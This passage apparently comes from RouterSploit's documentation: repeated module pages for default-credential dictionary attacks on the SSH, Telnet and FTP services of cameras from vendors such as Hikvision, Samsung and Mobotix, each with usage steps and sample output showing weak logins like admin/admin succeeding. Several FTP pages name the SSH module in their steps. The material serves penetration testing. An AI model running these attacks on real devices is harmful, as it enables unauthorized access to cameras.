Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/grandstream/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/grandstream/ssh_default_creds\nrsf (Grandstream Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Grandstream Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/grandstream/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Grandstream Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/grandstream/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/grandstream/telnet_default_creds\nrsf (Grandstream Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Grandstream Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/hikvision/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Hikvision Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/hikvision/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/hikvision/ftp_default_creds\nrsf (Hikvision Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Hikvision Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/hikvision/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Hikvision Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/hikvision/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/hikvision/ssh_default_creds\nrsf (Hikvision Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Hikvision Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/hikvision/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Hikvision Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/hikvision/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/hikvision/telnet_default_creds\nrsf (Hikvision Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Hikvision Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/honeywell/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Honeywell Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/honeywell/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/honeywell/ftp_default_creds\nrsf (Honeywell Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Honeywell Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/honeywell/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Honeywell Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/honeywell/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/honeywell/ssh_default_creds\nrsf (Honeywell Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Honeywell Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/honeywell/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Honeywell Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/honeywell/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/honeywell/telnet_default_creds\nrsf (Honeywell Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Honeywell Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/iqinvision/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against IQInvision Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/iqinvision/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/iqinvision/ftp_default_creds\nrsf (IQInvision Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (IQInvision Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/iqinvision/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against IQInvision Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/iqinvision/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/iqinvision/ssh_default_creds\nrsf (IQInvision Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (IQInvision Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/iqinvision/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against IQInvision Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/iqinvision/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/iqinvision/telnet_default_creds\nrsf (IQInvision Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (IQInvision Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/jvc/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against JVC Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/jvc/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/jvc/ftp_default_creds\nrsf (JVC Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (JVC Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/jvc/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against JVC Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/jvc/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/jvc/ssh_default_creds\nrsf (JVC Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (JVC Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/jvc/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against JVC Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/jvc/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/jvc/telnet_default_creds\nrsf (JVC Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (JVC Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/mobotix/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Mobotix Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/mobotix/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/mobotix/ftp_default_creds\nrsf (Mobotix Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Mobotix Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/mobotix/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Mobotix Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/mobotix/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/mobotix/ssh_default_creds\nrsf (Mobotix Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Mobotix Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/mobotix/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Mobotix Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/mobotix/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/mobotix/telnet_default_creds\nrsf (Mobotix Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Mobotix Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/samsung/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Samsung Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/samsung/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/samsung/ftp_default_creds\nrsf (Samsung Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Samsung Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/samsung/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Samsung Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/samsung/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/samsung/ssh_default_creds\nrsf (Samsung Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Samsung Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/samsung/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Samsung Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/samsung/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/samsung/telnet_default_creds\nrsf (Samsung Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Samsung Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/sentry360/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Sentry360 Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/sentry360/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/sentry360/ftp_default_creds\nrsf (Sentry360 Camera Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Sentry360 Camera Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/sentry360/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Sentry360 Camera SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/sentry360/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/sentry360/ssh_default_creds\nrsf (Sentry360 Camera Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Sentry360 Camera Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/cameras/sentry360/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Sentry360 Camera Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/sentry360/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/cameras/sentry360/telnet_default_creds\nrsf (Sentry360 Camera Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Sentry360 Camera Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/cameras/siemens/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Siemens Camera FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/cameras/siemens/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use 